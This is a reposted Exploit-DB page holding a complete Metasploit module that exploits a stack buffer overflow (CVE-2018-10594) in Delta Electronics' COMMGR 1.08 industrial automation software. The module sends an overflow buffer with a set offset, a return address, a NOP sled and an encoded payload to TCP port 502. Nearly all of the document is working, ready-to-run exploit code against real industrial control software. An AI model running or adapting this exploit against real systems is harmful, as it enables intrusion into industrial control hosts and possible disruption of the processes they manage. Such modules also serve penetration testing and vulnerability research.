Delta Electronics Delta Industrial Automation COMMGR 1.08 – Stack Buffer Overflow (Metasploit) - 体验盒子

作者： Metasploit

日期： 2018-10-09

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/45574/

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description'=> %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI',# Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload'=>
{
'Space'=> 640,
'DisableNops'=> true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets'=>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret'=> 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget'=> 0))

register_options(
[
Opt::RPORT(502)
])
end

def exploit
data =rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90"# jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded

print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end